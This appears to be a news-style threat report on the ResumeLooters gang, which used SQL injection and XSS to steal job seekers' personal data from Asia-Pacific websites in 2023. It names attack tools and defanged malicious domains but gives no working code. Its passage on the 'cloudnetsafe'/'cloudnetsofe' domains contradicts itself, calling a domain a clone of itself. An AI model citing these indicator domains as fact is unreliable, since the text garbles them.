ResumeLooters: Cyber Predators Targeting Job Seekers’ Data

In November 2023, a new and sinister threat emerged: ResumeLooters, a malicious gang that set its sights on job seekers’ sensitive personal data. Discovered by Group-IB’s Threat Intelligence unit, ResumeLooters launched a massive campaign aimed at employment agencies and retail companies primarily located in the Asia-Pacific (APAC) region. Their modus operandi involved stealing and selling sensitive user data, and their tactics were nothing short of audacious.

The group was a complete enigma, previously unknown to the cybersecurity community. However, their modus operandi was unmistakable. They focused on infiltrating job search platforms and brazenly swiping resumes, hence the moniker “ResumeLooters.”

Between November and December 2023, ResumeLooters left a trail of chaos. Their nefarious activities encompassed SQL injection and Cross-Site Scripting (XSS) attacks, leaving victims reeling. With a primary focus on India, Taiwan, Thailand, and Vietnam, the gang honed in on vulnerable targets, leaving behind a staggering tally of 65 compromised websites.

The stolen files contained a trove of 2,188,444 rows of data, with 510,259 rows specifically pilfered from job search websites. This data goldmine included names, phone numbers, emails, dates of birth, employment histories, and a treasure trove of other sensitive personal information.

ResumeLooters weren’t your run-of-the-mill cybercriminals; they were well-armed with an arsenal of penetration testing tools. Tools like sqlmap, Acunetix, Beef Framework, X-Ray, Metasploit, ARL (Asset Reconnaissance Lighthouse), and Dirsearch were all at their disposal.

SQL injection attacks via sqlmap were their preferred initial vector of attack. However, the gang’s versatility shone through with their use of XSS scripts, embedded cunningly into legitimate job search websites.

Cross-site scripting (XSS) was a pivotal weapon in ResumeLooters’ arsenal. By injecting malicious scripts into legitimate job search websites, they aimed to hijack unsuspecting users’ experiences.

Several compromised websites bore the scars of this insidious technique. A fake employer profile on one such site contained an injected XSS script that referenced a malevolent domain, 8r[.]ae. This was the gateway to a web of deception.

The gang’s deviousness knew no bounds. They even created a fake company profile, complete with a strategically placed XSS script. This seemingly innocuous profile contained a link to admin.cloudnetsafe[.]com, a domain suspected to be associated with the group.

Admin.cloudnetsofe[.]com was a clone of the main malicious domain linked to ResumeLooters, admin.cloudnetsofe[.]com. Both hosted malicious scripts and phishing pages, laying bare their sinister intentions.

ResumeLooters’ tenacity was evident in their repeated attempts to insert XSS scripts into various web forms on targeted websites. They were banking on these scripts displaying phishing forms, luring unsuspecting users into a web of deceit.

While not every device fell victim to these scripts, some did, and this provided ResumeLooters with access to a wealth of stolen HTML code and other sensitive data.

With a simple yet potent combination of publicly available tools and techniques, ResumeLooters caused widespread damage. These attacks underscore the dire need for organizations to prioritize cybersecurity and remain vigilant in the face of evolving threats.